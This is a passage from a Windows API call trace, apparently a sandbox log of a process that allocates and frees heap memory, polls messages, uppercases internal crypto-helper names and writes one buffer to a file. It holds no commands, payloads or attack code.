Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0189.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0189.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.189] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0189.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0189.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.189] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0189.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.190] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0189.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0189.190] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0189.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0189.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0189.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0189.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0189.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0189.191] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.191] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0189.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0189.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0189.191] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0189.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0189.191] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0189.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0189.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0189.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.192] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.192] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11778) returned 0x3c02f48 [0189.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0189.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11778) returned 0x3c25e48 [0189.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.194] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c02f48 | out: hHeap=0x970000) returned 1 [0189.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.195] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11778) returned 0x3c02f48 [0189.197] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c25e48 | out: hHeap=0x970000) returned 1 [0189.198] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.198] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11778) returned 0x3c25e48 [0189.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c02f48 | out: hHeap=0x970000) returned 1 [0189.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0189.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0189.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0189.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0189.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0189.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0189.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0189.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0189.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf17c8 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0189.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0189.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0189.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0189.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0189.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0189.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c146c8 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0189.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0189.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0189.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0189.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0189.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0189.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f35798 | out: hHeap=0x970000) returned 1 [0189.241] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0189.241] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11778) returned 0x3c375c8 [0189.244] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c25e48 | out: hHeap=0x970000) returned 1 [0189.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0189.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0189.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0189.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0189.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0189.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11778) returned 0x2f24018 [0189.250] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.250] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0x11778, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0x11778, lpOverlapped=0x0) returned 1 [0189.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0189.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0189.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0189.255] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0189.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0189.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0189.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0189.255] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0189.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0189.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, 